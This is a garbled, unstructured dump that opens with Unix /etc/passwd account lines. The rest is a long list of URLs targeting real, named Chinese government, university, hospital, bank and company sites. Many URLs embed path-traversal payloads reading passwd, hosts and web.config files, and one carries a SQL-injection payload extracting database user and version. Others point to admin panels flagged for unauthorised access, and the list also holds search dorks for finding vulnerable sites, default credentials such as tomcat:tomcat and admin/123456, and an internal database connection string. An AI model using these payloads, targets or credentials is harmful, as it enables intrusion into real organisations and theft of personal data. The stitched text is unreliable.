ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:159:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin nagios:x:500:500::/home/nagios:/bin/bash mysql:x:101:160:MySQL server:/var/lib/mysql:/bin/bash oracle:x:501:501::/home/oracle:/bin/bash oracle:dba http://www.cqsxzxyy.com/fy/jij/View.asp?id=474 http://www.cd120.com/departAnddocSearch.jspx?outpatientDate=&dointdept=&department=&clinicgroup=&speciality=&doctorname=1 http://m.xiamenair.cn/ http://bbs.jj.cn/viewthread.php?tid=2424793&extra=page%3D1, http://220.180.203.210/index.action http://220.180.203.210/servlet/FileDownload?filepath=C%3a%5cwindows%5csystem32%5cdrivers%5cetc%5chosts http://www.ordos.gov.cn/ http://www.ordos.gov.cn/swssp/servlet/FileDownload?filepath=C%3a%5cwindows%5csystem32%5cdrivers%5cetc%5chosts http://www.yk.gov.cn:3721/zwgk/ http://www.yk.gov.cn:3721/zwgk/servlet/FileDownload?filepath=C%3a%5cwindows%5csystem32%5cdrivers%5cetc%5chosts http://ting.weibo.com/music/weidanmobile/add?sid=2858931&gid=defaultid&key=f10aba96cdedec5df88cdaf6371d9ebf&token=5e04af60a57bc0b130ac9550f879b86e&plat=pc http://cas.yundasys.com/pma/index.php http://www.dysjw.gov.cn/LeaderShow.asp?lid=1 http://116.211.21.204/bbs/bbs.rar,我换成了 http://116.211.21.204/bbs.rar,cao,直接下载了,我也是醉了,你们就不能登陆到服务器稍微检查下?。。 http://xiazai.sogou.com http://www.runoqd.com/左边的2个管理系统 http://58.58.34.98:8190/MainForm.aspx http://58.58.34.98:8096/MainForm.aspx http://www.wxrunoqd.com/ shmc.shmu.edu.cn/admin/admin_login.aspx http://automation.xupt.edu.cn/article.php?pid=3 http://gr.xidian.edu.cn/paginationAction.do?id_xxnr=18 http://sjjx.xidian.edu.cn/dede3/dede/test.php?action=SUExp http://see.xidian.edu.cn/youth/e/admin/index.php http://sjjx.xidian.edu.cn/dede3/include/config_base.php http://scsgkyy.com/keshi.aspx?type=87 http://123.125.84.97/dgpt/search.php?word=xxooxoxoxoxoxo http://123.125.84.97/dgpt/search.php?word=xxooxoxoxoxoxo http://fn-sso.ceair.com:7010/sso/cmd.jsp jdbc:oracle:thin:@172.20.34.234:1521:fxw3db1 http://tw.qust.edu.cn/gzsc/index.asp?page=2&classid=19&Nclassid=34 http://jw.qust.edu.cn/jwlist.asp?ClassID=3 http://jw.qust.edu.cn/Admin_Login.asp登陆后可上传文件。 http://jw.qust.edu.cn/admin_index.asp http://www.xgskjj.gov.cn/xgkjj/login.php http://www.whrcbank.com、http://202.103.25.14:8081/whrcbank,其中http://www.whrcbank.com是反向代理服务器。目标网站存在多处安全漏洞,如下: http://www.whrcbank.com/upload/ http://www.whrcbank.com/downLoad?fileName=../WEB-INF/web.xml http://www.ycks.gov.cn/jkzsec.php?id=13488 http://**.**.**/pages/xxfb/editor/uploadAction.action inurl:/kdgs/ http://**.**.**/kdgs/_ http://**.**.**/kdgs/_ http://**.**.**/kdgs/_ http://**.**.**/kdgs/_ http://**.**.**/kdgs/ http://chinese.nenu.edu.cn/ http://chinese.nenu.edu.cn/show_news.php?id=991 http://oa.t3.com.cn http://oa.t3.com.cn/Share/OrgUpFile.aspx inurl:ws2004/ http://www.suyaxing.com:81/ws2004/Model/login.asp inurl:cms/Column.aspx?LMID= inurl:/cms/Article.aspx?NRID= http://www.zchospital.com/cms/Article.aspx?NRID=12774&LMID=47 http://www.zjhl.org/cms/article.aspx?nrid=446&lmid=125 http://ywzxyy.com/cms/Article.aspx?NRID=10000131&LMID=41 http://sig.cem.org.cn/cms/Article.aspx?NRID=16525&LMID=29 http://www.hnzyy.cn/cms/Article.aspx?NRID=12541&LMID=105 http://oa.ywwsj.gov.cn/oa/cms/article.aspx?nrid=2853 http://www.zjqhyy.com/cms/article.aspx?nrid=13125&lmid=24 http://www.z2hospital.com/cms/Article.aspx?NRID=13440&LMID=153 http://www.zchospital.com/cms/Article.aspx?NRID=12774&LMID=47 http://www.zjhl.org/cms/article.aspx?nrid=446&lmid=125 http://sig.cem.org.cn/cms/Article.aspx?NRID=16525&LMID=29 http://www.z2hospital.com/cms/Article.aspx?NRID=13440&LMID=153 http://www.zjxsh.com/oa/login.aspx http://ywzxyy.com/login.aspx http://www.zjhl.org/hlzk/login.aspx http://www.zchospital.com/login.aspx http://www.zjkq.com.cn/login.aspx http://sig.cem.org.cn/login.aspx http://www.hnzyy.cn/login.aspx http://www.fysrmyy.com/login.aspx http://www.zjqhyy.com/login.aspx http://www.zjtongde.net/login.aspx http://www.zjxsh.com/oa/login.aspx www.zjxsh.com http://www.zjxsh.com http://soft.zzti.edu.cn/webcotorl/listcont.aspx?newsid=&typeid=202&typename=%B5%B3%BD%A8%B9%A4%D7%F7&secondname=%BD%CC%B9%A4%D6%AE%BC%D2 http://app.finance.china.com.cn/stock/longhu/stock.php?symbol=000611&d=2014-10-24 http://www.yxrsrc.gov.cn http://www.phoenixcne.de/caiji_news_comment.php?news_id=118239 http://www.phoenixcne.de/activity2013/activity_notice_content.php?notice_id=19&game_id=11 http://www.phoenixcne.de/caiji_news_list.php?category=china http://www.phoenixcne.de/guide.php?satellite_id=5 http://www.phoenixcne.de/important_news_content.php?news_id=134525 http://www.phoenixcne.de/recom_content.php?recom_id=219 http://www.dlgaoji.com/web_job.aspx?PosID=20140929112037301 http://www.hongzhoukan.com/getpass_1.php http://www.hongzhoukan.com/getpass_2.php http://www.hongzhoukan.com/getpass_3.php修改密码 http://www.hongzhoukan.com/getpass_3.php,页面没有做任何验证: http://www.hongzhoukan.com/getpass_4.php,并没有返回任何错误,而且发现同时还提交了值为空的“user”项,通过查看页面代码,发现存在一个属性为hidden名为user的字段: https://github.com/outofforce/tianyun/blob/71ced29dd02ac99edbaa48d11d6d607cb9f6a047/src/com/asiainfo/service/frame/common/SendMessage.java https://hq.mail.chinaunicom.cn/owa/ https://github.com/Nagafk/hello/blob/5dcce6df02da210be3cec4bda0a1e8a02c529012/sendmailtest.py https://corp.netease.com/coremail/ http://web.hnust.cn/xg/ http://web.hnust.cn/xg/xght/login.php?gotopage=%2Fxg%2Fxght%2Findex.php http://tv.gcu.edu.cn/upload/day_141028/201410281221219991.html https://github.com/muyuyuan007/check_private_information/blob/64f3054402952030a1d41362aa1d540b318b6616/check_private_info/config.txt https://github.com/jikaihu/work/blob/d29ee2bbb8d700c98df2c2d42a733fc46a1de128/logcollect/logexcel.py https://mail.hisense.com/ https://ssl.hisense.com/+CSCOE+/logon.html http://eps.xcmg.com:90/custom/groupnewslist.aspx?GroupId=155 http://eps.eastcom.com/custom/GroupNewsList.aspx?GroupId=181 http://zh404eps.cn/custom/GroupNewsList.aspx?groupId=114 http://www.ordos.gov.cn/12345/login.aspx http://www.dzmzj.gov.cn/jzxx/rulelist.asp?cid=2 http://bbs.renrendai.com/uc_server/avatar.php?uid=71673&size=middle http://hvsop.youku.com/player.php?id=2 http://hvsop.youku.com/player.php?id=2 http://www.baidu.com/s?wd=科发网上查询系统&ie=utf-8 http://cn.bing.com/search?q=科发网上查询系统&ie=utf-8 http://cwch.ahu.edu.cn/querynetweb/wjmm.aspx http://61.142.174.200/cwc/KFweb/wjmm.aspx http://gzcx.tynu.edu.cn/kfweb/wjmm.aspx http://221.5.51.228/cjb/wjmm.aspx http://210.45.92.21/wjmm.aspx http://www.shcdkf.com/kfweb/wjmm.aspx http://cwc.sxufe.edu.cn/KfWeb/wjmm.aspx http://cwch.ahu.edu.cn/querynetweb/wjmm.aspx http://cwch.ahu.edu.cn/querynetweb/wjmm.aspx http://www.vooc.com.cn/studyplan/2*/studyplanmembers xinyi.creditease.cn/ajax.do?action=registerMember http://www.yixin.com/company/ site:gov.cn inurl:sys0_inc_voteresult.asp?VoteID= site:gov.cn inurl:sys0_inc_voteresult.asp?VoteID= http://cslt.riit.tsinghua.edu.cn/cgi-bin/cvss/cvss_request.pl?account=wangd&cvssid=1&step=view_request http://www.dlgaoji.com) http://www.dlgaoji.com/filedown.aspx),查询功能存在POST注入。 www.dlgaoji.com http://www.dlgaoji.com http://act.pao.sdo.com/project/140811zhlj/admin/存在未授权访问。 http://act.pao.sdo.com/project/0910jinqiu/admin http://act.pao.sdo.com/project/140707maidong/admin http://act.pao.sdo.com/project/140627zh/admin http://act.pao.sdo.com/project/140516card/admin http://act.pao.sdo.com/project/140318lovenew/admin/ http://act.pao.sdo.com/project/v83/admin/ http://act.pao.sdo.com/project/111014pk/admin/ http://act.pao.sdo.com/project/101229/admin http://act.pao.sdo.com/project/100601tr/admin http://act.pao.sdo.com/project/100510_3year/Admin http://act.pao.sdo.com/project/turntable/admin/ http://act.pao.sdo.com/project/CallFriend/admin http://act.pao.sdo.com/project/090807lm/admin http://218.76.27.30:8080/ www.51charter.com,猜测后台管理地址http://admin.51charter.com/,访问控制薄弱,可暴力猜测用户名和密码(admin和123456),进入后可查询包机单位、用户的姓名、护照等敏感信息 http://m.he-pai.cn/login/logining http://www.he-pai.cn/phone/memberCenter/selphongbinding.do http://www.he-pai.cn/bank/memberCenter/selbank.do http://www.he-pai.cn/lntpayplandetail/memberCenter/selContract.do http://www.he-pai.cn/lntpayplandetail/memberCenter/selContract.do?CN_FL_NO=CTxxxxxxxxxxxxxx&CN_STS=0 http://www.he-pai.cn/investmentDetail/investmentDetails/view.do?ln_no=JK14101500897668 http://www.he-pai.cn/lntpayplandetail/memberCenter/selContract.do?CN_FL_NO=CT20141015056994&CN_STS=0 http://www.he-pai.cn/investmentDetail/investmentDetails/view.do?ln_no=JK14092500644774 http://www.he-pai.cn/lntpayplandetail/memberCenter/selContract.do?CN_FL_NO=CT20140925036331&CN_STS=0 http://www.zhuqu.com/tuce/116911.html http://act.avata.sdo.com/project/20140507qb/admin/Unity.ActivitySwitch.asp http://act.avata.sdo.com/project/2014sprite/admin/ http://act.avata.sdo.com/project/Data/admin/ http://act.avata.sdo.com/project/UrlStatic/admin/ http://act.avata.sdo.com/project/2013Avata61/admin/ http://act.fd.sdo.com/sys/admin_app/存在未授权访问。 http://act.fd.sdo.com/Project/GetCode/admin_app/ http://act.fd.sdo.com/Project/Lottery/admin_app/Default.aspx http://act.fd.sdo.com/bbs/web1/admin_app/Default.aspx http://act.fd.sdo.com/lj/admin/Default.aspx http://act.fd.sdo.com/Project/sjbjc/admin_app/Default.aspx http://act.fd.sdo.com/Project/RLR/admin_app/Default.aspx http://60.19.64.162 http://blog.mumayi.com/wp-login.php http://act.ff.sdo.com/project/20140926bhmt/admin/存在未授权访问。 http://act.ff.sdo.com/project/140402sc/admin http://act.ff.sdo.com/project/140610cosplay/admin http://act.ff.sdo.com/project/cbtevent/admin http://act.ff.sdo.com/project/20140904fftime/admin http://180.166.110.78/asms/index.jsp http://act.bao.sdo.com/project/20111227_sns/admin/Account.asp http://act.bao.sdo.com/201107_event/admin/ http://act.bao.sdo.com/project/showgirle/admin/ http://act.bao.sdo.com/201106_xiaoyouxi/admin/ http://act.bao.sdo.com/project/201106_back/admin/ http://act.bao.sdo.com/project/201104_if/admin/ http://act.bao.sdo.com/201103_xunlei/admin/ http://act.bao.sdo.com/201012_qianzhan/admin/ http://act.bao.sdo.com/201012_xinxi/admin/ http://act.bao.sdo.com/201012_card/admin/ http://act.bao.sdo.com/project/ChongZhiHuoDong/admin/ http://act.bao.sdo.com/201011_mail/admin/ http://act.bao.sdo.com/project/renren/admin/ http://act.bao.sdo.com/201010_QQ/admin/ http://act.bao.sdo.com/project/duobao/admin/ http://act.bao.sdo.com/201008_newgame/admin/ http://bbs.igeak.com/bbs/develop.php http://218.58.78.204:8080/Web/performance/login.asp http://218.58.78.204:8080/Web/standard/login.asp http://kj.qdf.gov.cn/ http://bb.sdo.com/ http://www.igeak.com/ http://10w.igeak.com/smartmain.php?mod=smp_user&uid=1 http://58.215.55.97/smartmain.php?mod=smp_user&uid=1(应该是盛大的一个测试站) http://www.beike8.com/bbs/develop.php http://wooyun.org/bugs/wooyun-2010-069864 http://www.agrij.com/) https://github.com/Yunfei1982/cg_site/blob/508e05ad3a6a3e26ff0c0dac0e35a0606f6a9ad6/include/sendmail.php http://spaqbz.zjwst.gov.cn/zjfsdata/loginAction!login.action www.yszfcg.gov.cn/Down.aspx?id= http://www.jszj.com.cn/zaojia/Login/printRegisterInfo.aspx?id=hacksb http://www.bysbfa.com/index.asp http://smile.wanda.cn/smile/praise/index http://zone.wooyun.org/ www.jd.com/pinpai/authcode.php?returnUrl=http%3A%2F%2Fwww.jd.com%2Fpinpai%2F672-14523.html http://active.coupon.jd.com/ilink/couponActiveFront/front_index.action?key=a86e346c8fe14e07b75ea3bd2ba97900&roleId=368219&to=sfbest.jd.com http://active.coupon.jd.com/ilink/couponActiveFront/front_index.action?key=a86e346c8fe14e07b75ea3bd2ba97900&roleId=368219&to=www.qq.com http://www.qorosauto.com/post_campaign/admin http://www.qorosauto.com:80/post_campaign/ www.qorosauto.com http://jwc.hqu.edu.cn http://libs.baidu.com/bootstrap/3.0.3/css/bootstrap.min.css http://libs.baidu.com/jquery/2.0.0/jquery.min.js http://libs.baidu.com/bootstrap/3.0.3/js/bootstrap.min.js inurl:/kdgs/ http://**.**.**/kdgs/_ http://**.**.**/kdgs/_ http://**.**.**/kdgs/_ http://**.**.**/kdgs/_ http://**.**.**/kdgs/ http://*******.gov.cn/kdgs/ http://xxxx.xxx//kdgs/biz/portal/login/login.action http://*******.gov.cn/kdgs/core/superuser/superUserList.jsp http://metc.cczu.edu.cn/video/open.asp?film1=12321&film2=2514 http://www.jletc.gov.cn/ http://218.6.128.130/web/web/web/wendang.asp?ks=%BD%CC%D1%A7%D1%D0%BE%BF%BF%C6 http://218.6.128.130/web/web/web/chaxed.asp http://218.6.128.130/photo/201304140221.jpg http://df.wyn88.com:8087/ com:8087 http://df.wyn88.com:8087 https://github.com/jackey/yenching/blob/eda3a27d35a769db573a5ea0291903d5aa59e345/application/controllers/IndexController.php http://mail.pku.edu.cn/ https://github.com/beeven/py-proxiedmail/blob/68f7bb7a698b05ab4e5335b17fdca51d320834b2/SMTPviaHTTPProxy.py http://mail.customs.gov.cn/ https://github.com/skdfeitian/DPPS/blob/5c02725c27ef886849aa9a2da1de33dc4808e617/tags/v1.5/client/FY3Client/Projects/CossPreMonCtrlManager/app.config http://rays.cma.gov.cn/ https://117.146.19.3/datagateway/index.action http://xcb.games.sdo.com/edit/index/27503203 http://wow.laoyuegou.com/guild/raidLadder/type/2/worldRealm/1%29%20AND%20EXTRACTVALUE%282855,CONCAT%281,user%28%29,0x7c,version%28%29%29%29%20AND%20%286145=6145/realm/%E9%98%BF%E5%B0%94%E8%90%A8%E6%96%AF.html http://www.xyrlzycs.com http://www.xyrlzycs.com/wyqz_qy_home.jsp?id=21682 http://med.hunnu.edu.cn/photo/admin.asp http://top.chinaz.com/site_www.stockstar.com.html http://www.lhgcdy.gov.cn/public/down.aspx?filename=web.config&filepath=web.config http://etc.hebut.edu.cn/select/xk_login.aspx http://dg.uninx.com/ http://dg.uninx.com/lottery/zhuce.php http://fzghc.hbu.cn/fazhanguihua/admin/Login.asp http://www.qorosauto.com/post_campaign存在SVN http://www.qorosauto.com/post_campaign/.svn/entries http://www.qorosauto.com/post_campaign/index.php http://www.gsa.gov.gh/ http://apps.sicnu.edu.cn/_wx/_wx_home_news.aspx?fid=&kw= http://yzb.cucn.edu.cn|admin|bd91cb7f4580f19ecccc http://hzw.92le.com/reread/wml.do?fn=../../../../../../../../../../etc/passwd%00.jpg&pn=$gopn&ps=15 http://hzw.92le.com/reread/w.do?f=GEHT&fn=../../../../../../../../../../etc/passwd%00.jpg&pt=ct http://202.108.14.240:8080/monitor.tar.gz http://124.238.218.82/ http://124.238.218.82/member/forgotpassword.html http://wdcx.yundasys.com:81/jjjk/jjjk.php http://shop.taikang.com/phpinfo.php http://shop.taikang.com/ck1.log http://shop.taikang.com/phpm/index.php http://zt.365jilin.com sql:http://zt.365jilin.com/module/form/content/?id=190 http://add.11185.cn/vir_add_front/toRegister.a www.7958.com http://www.7958.com http://www.xiao5u.com http://www.Xiao5u.com/Demo/Survey www.xiao5u.com http://www.rswjj.gov.cn/newsinfo.asp?id=29 http://124.238.218.152/ http://124.238.218.152/user/forgetpasswd.do http://m.cndns.com/default.aspx http://m.cndns.com/cloud/index.aspx http://114.255.123.104/ https://github.com/u9510606/NBL_sys/blob/9cdfb1fd62873c01227f850785f0b302c4e351d3/config/initializers/setup_mail.rb https://fwebmail.nctu.edu.tw/roundcube/ http://www.sanyuan.com.cn/flash_upload.php?modelid=1 http://kjc.njupt.edu.cn/admin/loginAdminUser.action http://www.hebmm.org.cn/shownews2.asp?news_id=2920 http://www.hebmm.org.cn/admin/ http://www.jwrd.gov.cn/content.asp?id=838&TypeKind=74%E2%80%98 http://qx.xiangtan.gov.cn/Content.asp?id=101373 http://www.lzfda.gov.cn/wjgl1/Admin_List.asp http://61.129.89.230/YuQing/LoginAdmin.aspx http://kls.scs.gov.cn/klspt/downloadfile.jsp?file=/klspt/downloadfile.jsp http://www.hbbfyfy.com/yy/newPages/Query_Res.aspx?hos_id=xw www.wooyun.org/bugs/wooyun-2010-072921 http://xxxx/system/config/deptTreeXml.jsp?type=group&SG04=1 http://**.**.**/hm/Admin/Checkup/ChkUpMemberPrint.aspxCheckRepID=194435&PatientID=87188 http://www.xiao5u.com/Product/Survey.html http://127.0.0.1/asp/Survey/admin/Admin.asp http://tsg.sxtyu.com:9302/showdetail.asp?class=2&id=19 https://113.107.199.107/ http://www.517lppz.com/admin/login.aspx http://wooyun.org/bugs/wooyun-2010-066857 inurl:cpzs.asp?ProClass= http://www.0527369.com//manage/Product/add_news.asp http://sqjrgjg.com//manage/Product/add_news.asp http://www.zsjyl.com//manage/Product/add_news.asp http://www.cpkgj.com//manage/Product/add_news.asp http://sqztbg.com/manage/Product/add_news.asp http://www.yxjzsb.com/manage/Product/add_news.asp http://www.sqjxbj.com/manage/Product/add_news.asp http://www.0517hscz.com/manage/Product/add_news.asp http://www.sabulina.com/manage/Product/add_news.asp http://www.yh9867.com/manage/Product/add_news.asp http://www.njxiangyu.com/manage/Product/add_news.asp http://sqhyjx.com//manage/Product/add_news.asp http://www.sabulina.com//manage/Product/add_news.asp http://www.cba.gov.cn/cbastats/elselivedetail.aspx?id=1 http://cs.sina.com.cn/minisite/news/20120412aw006.html http://www.gaosiedu.com/like/login.php http://www.gaosiedu.com/jianli/ajax_user.php?act=do_reg http://www.gaosiedu.com/xuliqizhong/index.php/AjaxGet http://www.gaosiedu.com/like/login.php http://315web.duowan.com/index.jsp http://219.72.225.74/ www.dyk.com.cn http://www.ccedin.net/ccedinweb/indexshow.actionS2-019漏洞 http://61.139.105.130:8080/zzxy/ http://cjwhcbyjzx.suse.edu.cn/ www.wxpangu.com无锡盘古 http://www.wxliuhuan.com/news_s.asp?id=274 http://www.0510df.com/news_s.asp?id=164 http://www.ssyyjx.com/products_s.asp?id=981 http://www.cxfh.net/products_s.asp?id=1049 http://www.0510df.com/news_s.asp?id=164 http://www.wxthcb.com/news_s.asp?id=148 http://www.wxasl.net/about.asp?id=65 http://wooyun.org/bugs/wooyun-2010-068250 http://gbbs.gsta.com inurl:DownloadShow.asp?DownID= http://218.4.48.253/Chinese/Downloadshow.asp?DownID=131 http://www.leige.com.cn/Chinese/DownloadShow.asp?DownID=26 http://www.jllgs.com/chinese/DownloadShow.asp?DownID=36 http://www.99smsoft.com/Chinese/DownloadShow.asp?DownID=16 http://www.wmt.com.cn/chinese/DownloadShow.asp?DownID=55 http://www.sh-q.com.cn/Chinese/DownloadShow.asp?DownID=43 http://www.szxinjiaxin.com/DownloadShow.asp?DownId=4 http://www.hengtongchemical.com/chinese/DownloadShow.asp?DownID=24 http://www.shtatm.com/Chinese/DownloadShow.asp?DownID=1 http://www.shtatm.com/Chinese/DownloadShow.asp?DownID=1 http://www.mhtsoft.com/Chinese/DownloadShow.asp?DownID=95 http://www.860536.cn/chinese/DownloadShow.asp?DownID=27 http://www.skyartec.com/DownloadShow.asp?ID=1733 http://qywz21.wygk.cn/Chinese/DownloadShow.asp?DownID=31 http://www.baacebattery.com/downloadshow.asp?id=378 http://www.zh-rx.com/zhrx/Chinese/DownloadShow.asp?DownID=26 http://www.zh-rx.com/zhrx/Chinese/DownloadShow.asp?DownID=26 http://www.wuzhouyiyao.com/Chinese/DownloadShow.asp?DownID=58 http://www.bsckpi.com/kpi/DownloadShow.asp?ID=3 http://www.hydraclean.com.cn/Chinese/DownloadShow.asp?DownID=46 http://www.djwxe.com/chinese/DownloadShow.asp?DownID=27 http://www.xiao5u.com/Product/Survey.html http://127.0.0.1/asp/Survey/admin/Admin.asp?wor=del&id=1 http://127.0.0.1/asp/Survey/admin/Admin.asp?wor=del&id=1 http://isdm.nuc.edu.cn/DownFile.aspx?Upload_url=web.config http://jpkc.nuc.edu.cn/jcskjs/DownFile.aspx?Upload_url=web.config http://gfs.nuc.edu.cn/adminis/DownFile.aspx?Upload_url=web.config http://shss.nuc.edu.cn/DownFile.aspx?Upload_url=web.config http://xscj.nuc.edu.cn/DownFile.aspx?Upload_url=web.config http://std.nuc.edu.cn/DownFile.aspx?Upload_url=web.config http://1y.nuc.edu.cn/DownFile.aspx?Upload_url=AdminLogin.aspx.cs http://www1.nuc.edu.cn/kjy/DownFile.aspx?D_Url=\web.config http://ischoolgu.xmu.edu.cn:8002/jyzdzx/admin/login.asp http://count.52pk.com/php.tar.gz http://copyright.baidu.com/caches/configs/database.php.bak http://www.zhuqu.com/activity/airclean/item-desc http://www.samsoncn.com/ http://ygcw.fy.gov.cn/lq/nczy/admin/index.asp www.dlpss.com http://www.dlpss.com http://119.37.194.120/5.jsp http://fex.baidu.com/blog/2014/04/traffic-hijack-2/): http://211.137.243.2:8902/manager/html http://211.137.243.2:8900/manager/html http://211.137.243.2:9300/manager/html http://211.137.243.2:18103/manager/html http://211.137.243.2:18103/probe/ http://211.137.243.2:9999/ http://211.137.243.2:9500/host-manager/html http://211.137.243.2:29798/ http://211.137.243.2:10001/partner/ http://211.137.243.2:8900/weban/login.jsp http://211.137.243.2:8902/report/login.jsp http://211.137.243.2:18103/manager存在弱口令tomcat:tomcat http://share.escience.gov.cn/download.action?filename=xxx http://share.escience.gov.cn/download.action?filename=/etc/passwd http://www.mzredcross.com/show.php?id=558 www.strongsoft.net http://210.75.219.20/guiji/login.do http://dota2.sgamer.com/Public/Images/images/top_c.php http://www.cd-suse.cn/memory_album.php?name=%E9%9D%92%E6%98%A5%E7%9A%84%E5%AE%B6 http://www.57pk.cn/game.php?action=server_list&game_id=2 http://www.tiandemuye.com/lookarticle.asp?articleid=183 http://www.yycyj.com/products.asp?bigclassname=%CE%E5%BD%F0%CB%DC%C1%CF%BB%FA%D0%B5%7C%CE%E5%BD%F0%CB%DC%C1%CF%BB%FA%D0%B5 http://www.bdhjdmp.com/about.asp?id=7 http://www.beifangzite.com/about.asp?id=5 http://www.xynsh.cn/xx.asp?id=1 http://www.cdjphx.com/city_index.aspx?city=sichuan http://www.xing7ba.com/shenghuo/show.asp?id=2590 http://www.zzsywlgs.com/city_index.aspx?city=beijing http://www.demeiju.com/theme.asp?classid=14 http://www.zgbqbh.com/News_show.asp?News_Type=1&News_ID=1304 http://www.yamazensh.com/ContactUs.aspx?rid=1 http://www.tagthg.com/cf.asp?xx_chanpin_class_id=21 http://www.jmmaolian.com/newsshow.asp?ac=news&id=405 http://www.deanqz.com/product_fl.php?type_id=8 http://www.szairbetter.com/Product.asp?bclassid=40 http://www.huweipian.net/plus/search.php?q=%E7%A2%A7%E6%A1%82%E5%9B%AD%E5%A4%AA%E9%98%B3%E5%9F%8E http://www.120911.cn/detail.asp?id=629 http://www.jngcsy.com/News_Details.asp?id=127 http://www.jztiejian.com/sortinfo.asp?column_cat_id=99 http://www.zhongyisuji.com/ArticleShow.asp?ArticleID=110 http://www.qiqiangdakuaitie.com/jyton/info_article.asp?id=1057 http://www.wn5.cc/forum.php?mobile=yes http://www.syworld8.com/news.aspx?newsClassName=%E5%85%AC%E5%8F%B8%E6%96%B0%E9%97%BB http://www.dyzhibo.com/type.php?cat=1000 http://www.czminyi.com/product.asp?bigclass=PE+%B7%A2%C5%DD%CE%FC%CB%DC%B0%FC%D7%B0 http://www.xuelinjixie.com/news.asp?nlt=49 http://www.gz0599.cn/shop/mk2/cpView.asp?id=858&user=licdb http://sxsnmy.com/nshow.asp?thex=183&Cla=45&ncla=0&clink=jpgc.asp http://www.sjpx100.com/NewsShow.asp?news_type=6&NewsId=617 http://www.xypawn.com/news.asp?ID=397 http://www.meiqivehicle.com/city_index.aspx?city=sichuan http://www.ruifeng-tools.com/ProductInfo.asp?id=45 http://51youqu.com/article.php?pid=22 http://www.jiajikuaiyun.com.cn/news.asp?pd=1 http://www.huowatoys.com/plus/search.php?kwtype=1&keyword=%CD%F8%C9%CF%D0%C5%CF%A2%B2%E9%D1%AF&x=22&y=6 http://www.csg.org.cn/About.asp?CID=2 http://www.xztymm.com/about.asp?id=1 http://www.anhuiguangsha.com/Article.asp?id=396 http://www.xhwfg.com/newinfo/BullShow.asp?id=1 http://www.jcxdhy.com/info/class.asp?id=17 http://www.akstuliu.com/newsindex.asp?class1=1 http://www.haoip.com.cn/jianzhan.asp?bigclassid=1 http://www.jzlhsyzc.com/jszn_list.aspx?classid=1 http://www.sgdapengbaowenbei.com/info.asp?id=1 http://www.trhw.org.cn/list.asp?id=1 http://www.gzlyline.com/tourmeeting/showmeeting.asp?Mid=115 http://www.sidite.com.cn/city_index.aspx?city=ningbo http://www.sntg007.com/cpshow.asp?id=50 http://whuma.com/news.asp?classid=8 http://www.sdhfzyg.com/pt_cpzs.asp?id=91 http://www.yydqzx.com/About.asp?ID=26 http://nxgy.lss.gov.cn/web/topic/nljsList.asp?PARENTTYPEID=3&TYPEID=127 http://www.jpsj88.net/chanpin.asp?sid=217 http://www.jnmll.com/about.asp?id=1 http://www.giscontest.com/12gis/page.asp?aid=560 http://www.water0757.com/jianli.asp?id=71 http://www.ytdlqj.com/info.asp?id=1 http://www.ndhjdmp.com/about.asp?id=7 http://www.gzmingwen.com/news_view.asp?id=129 http://www.cofuller.net/info.asp?id=5 http://www.sdefcp.com/about.asp?id=2 http://www.chwanda.com/info.asp?id=1 http://www.jzjxzz.net/city_index.aspx?city=chongqing http://www.ytjinhui.net/about.asp?id=5 http://www.cdyyvip.com/city_index.aspx?city=sichuan http://www.drguolu.com/rss.php?auth=0 http://www.sostarchina.com/NewsList.asp?ID=27 http://www.yniso9001.net/CaseView.aspx?did=137 http://www.hjskj.com/city_index.aspx?city=luoyang http://www.shenli.com/show_news.aspx?NewsId=594&CateId=13 http://www.zjxscoop.com/zcfg.asp?classId=18 http://www.sztuojing.com/technology.php?cid=36 http://www.lyhxba.com/company.asp?id=1 http://www.cnfda.net/company1.php?userid=34 http://weidft.com/en/into1.asp?id=17 http://www.mbit.cn/Newsshow.asp?id=3 http://www.csagency.com.cn/chn200909301056397/article.jsp?articleId=7480584 http://www.art800.cn/art.asp?sort=1 http://www.climate.sx.cn/listnews.php?id=2 http://www.sem198.com/newsinfo.aspx?id=212 http://www.huzwater.com/inc/voteShow.asp?subjectid=8 http://www.dayline.cn/demo/Product.asp?M_id=17 http://www.plp88.com/forum.php?mod=rss&auth=0 http://www.szasy.com/about.asp?id=1 http://www.gerlet.net/city_index.aspx?city=tianjin http://www.cqyylp.com/plus/search.php?fruits=&jiage=&keyword=%E6%88%B7%E5%A4%96%E7%94%A8%E5%93%81&kwtype=0 http://www.free-webhosts.com/reviews/Community_Architect.php?cohost=00space http://www.mzzhentian.com/product/view.php?id=26 http://www.cnmeiw.com/ArtNews/ArtNews_list.php?Typeid=126 http://www.jlbssw.cn/info_detail.asp?id=33 http://www.brsbearing.com/ProductList.asp?id=29 http://www.petjy.com/AnnounceInfo.aspx?id=42 http://www.tjdhst14.com/producttd.asp?id=102 http://www.028guanggao.com/product_show.asp?id=121 http://www.gufanyoga.com.cn/kechengsort.php?sortid=1 http://www.guoyujc.com/about.asp?id=1 http://gestaorecursos.cpb.org.br/outras_receita.php/?id=2013 http://www.sddlpcb.com/city_index.aspx?city=shenzhen http://www.ytbona.com/club_show.asp?id=56 http://www.zbguolu.com/info.asp?id=1 http://www.hnqtq.com/city_index.aspx?city=jiangsu http://www.hbxycq.com/about.asp?id=1 http://www.seastarqj.com/productclass2.asp?anclassid=21 http://www.seazheng.cn/base_info.asp?id=1 http://www.seguphoto.com/case.php?id=117 http://www.sem186.com/newshow.asp?id=459 